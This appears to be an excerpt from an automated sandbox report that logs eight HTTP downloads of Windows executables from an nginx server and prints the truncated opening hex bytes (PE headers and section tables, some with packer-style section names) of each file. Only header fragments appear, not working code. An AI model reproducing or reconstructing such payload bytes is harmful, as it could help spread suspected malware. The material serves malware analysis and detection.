Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:27:10 GMTContent-Type: application/octet-streamContent-Length: 10302976Last-Modified: Fri, 24 Jan 2025 18:07:34 GMTConnection: keep-aliveETag: "6793d6e6-9d3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 16 9d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 24 49 00 00 bc 04 00 00 00 00 00 d0 61 06 00 00 10 00 00 00 f0 94 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 80 a0 00 00 04 00 00 f7 da 9d 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 9c 00 dc 03 00 00 00 60 a0 00 97 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 9c 00 6a a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 fa 94 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 65 22 49 00 00 10 00 00 00 24 49 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 a8 4b 00 00 40 49 00 00 aa 4b 00 00 28 49 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 93 07 00 00 f0 94 00 00 9e 04 00 00 d2 94 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 dc 03 00 00 00 90 9c 00 00 04 00 00 00 70 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6a a0 03 00 00 a0 9c 00 00 a2 03 00 00 74 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 50 a0 00 00 02 00 00 00 16 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 97 1c 00 00 00 60 a0 00 00 1e 00 00 00 18 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:27:22 GMTContent-Type: application/octet-streamContent-Length: 905203Last-Modified: Sat, 25 Jan 2025 19:48:26 GMTConnection: keep-aliveETag: "6795400a-dcff3"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 c0 10 00 00 04 00 00 7d 40 0e 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 16 a4 00 00 00 00 00 00 00 00 00 00 33 73 0d 00 c0 5c 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 16 a4 00 00 00 00 10 00 00 a6 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 b0 10 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:27:27 GMTContent-Type: application/octet-streamContent-Length: 553984Last-Modified: Sun, 26 Jan 2025 10:34:22 GMTConnection: keep-aliveETag: "67960fae-87400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 11 56 3d e7 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 50 03 00 00 0a 00 00 00 00 00 00 fe 6d 03 00 00 20 00 00 00 80 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 08 00 00 04 00 00 62 26 04 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b0 6d 03 00 4b 00 00 00 00 80 03 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 6e 6d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 4e 03 00 00 20 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e 06 00 00 00 80 03 00 00 08 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 53 00 00 00 00 00 16 05 00 00 c0 03 00 00 16 05 00 00 5e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:27:35 GMTContent-Type: application/octet-streamContent-Length: 4508672Last-Modified: Mon, 20 Jan 2025 12:26:20 GMTConnection: keep-aliveETag: "678e40ec-44cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 5d 91 c9 31 3c ff 9a 31 3c ff 9a 31 3c ff 9a 43 bd fc 9b 3a 3c ff 9a 43 bd fa 9b be 3c ff 9a 43 bd fb 9b 22 3c ff 9a 20 ba fc 9b 25 3c ff 9a 20 ba fb 9b 23 3c ff 9a 20 ba fa 9b 1a 3c ff 9a 43 bd fe 9b 36 3c ff 9a 31 3c fe 9a b2 3c ff 9a b5 ba fb 9b 30 3c ff 9a b5 ba fd 9b 30 3c ff 9a 52 69 63 68 31 3c ff 9a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 80 39 8e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 16 3e 00 00 c8 06 00 00 00 00 00 65 e3 1e 00 00 10 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 63 00 00 04 00 00 e1 51 45 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 02 5e 00 50 00 00 00 00 a0 5f 00 90 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 5e 00 e8 0c 01 00 08 97 5d 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 96 5d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 62 73 73 20 b5 1e 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 e0 2e 74 65 78 74 00 00 00 dd 14 3e 00 00 d0 1e 00 00 16 3e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 1f cf 00 00 00 f0 5c 00 00 d0 00 00 00 1a 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 3f 00 00 00 c0 5d 00 00 2a 00 00 00 ea 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 8c 11 00 00 00 00 5e 00 00 12 00 00 00 14 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6d 73 76 63 6a 6d 63 c1 01 00 00 00 20 5e 00 00 02 00 00 00 26 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 70 74 61 62 6c 65 99 01 00 00 00 30 5e 00 00 02 00 00 00 28 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 87 5f 01 00 00 40 5e 00 00 60 01 00 00 2a 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 90 40 04 00 00 a0 5f 00 00 42 04 00 00 8a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:27:45 GMTContent-Type: application/octet-streamContent-Length: 1918976Last-Modified: Sun, 26 Jan 2025 13:30:28 GMTConnection: keep-aliveETag: "679638f4-1d4800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 cb 85 81 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 28 04 00 00 ba 00 00 00 00 00 00 00 80 4b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 4b 00 00 04 00 00 43 7d 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 50 05 00 6b 00 00 00 00 40 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 51 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 30 05 00 00 10 00 00 00 7a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 40 05 00 00 02 00 00 00 8a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 50 05 00 00 02 00 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2b 00 00 60 05 00 00 02 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6b 74 7a 6e 63 6d 69 00 90 1a 00 00 e0 30 00 00 90 1a 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 64 61 75 69 7a 6a 78 00 10 00 00 00 70 4b 00 00 06 00 00 00 20 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 4b 00 00 22 00 00 00 26 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:27:54 GMTContent-Type: application/octet-streamContent-Length: 6492672Last-Modified: Fri, 24 Jan 2025 09:42:38 GMTConnection: keep-aliveETag: "6793608e-631200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 f4 61 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 48 2d 00 00 22 06 00 00 00 00 00 60 54 06 00 00 10 00 00 00 00 5b 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 40 66 00 00 04 00 00 0d 07 64 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 f0 62 00 dc 03 00 00 00 20 65 00 98 1a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 63 00 52 07 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d 5b 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 05 47 2d 00 00 10 00 00 00 48 2d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 dc 94 2d 00 00 60 2d 00 00 96 2d 00 00 4c 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 ed 07 00 00 00 5b 00 00 06 05 00 00 e2 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 dc 03 00 00 00 f0 62 00 00 04 00 00 00 e8 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 52 07 02 00 00 00 63 00 00 08 02 00 00 ec 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 10 65 00 00 02 00 00 00 f4 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 98 1a 01 00 00 20 65 00 00 1c 01 00 00 f6 61 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:28:04 GMTContent-Type: application/octet-streamContent-Length: 1904640Last-Modified: Sun, 26 Jan 2025 13:23:28 GMTConnection: keep-aliveETag: "67963750-1d1000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 44 f0 76 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 30 04 00 00 b8 00 00 00 00 00 00 00 00 4b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 4b 00 00 04 00 00 4d b1 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 59 60 05 00 6d 00 00 00 00 50 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 05 00 00 10 00 00 00 84 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 50 05 00 00 02 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 05 00 00 02 00 00 00 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 70 05 00 00 02 00 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 71 74 72 6d 6e 73 6b 00 50 1a 00 00 a0 30 00 00 50 1a 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 73 6b 6b 78 6d 7a 79 00 10 00 00 00 f0 4a 00 00 04 00 00 00 ea 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 4b 00 00 22 00 00 00 ee 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:28:10 GMTContent-Type: application/octet-streamContent-Length: 3672387Last-Modified: Sun, 26 Jan 2025 10:48:58 GMTConnection: keep-aliveETag: "6796131a-380943"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 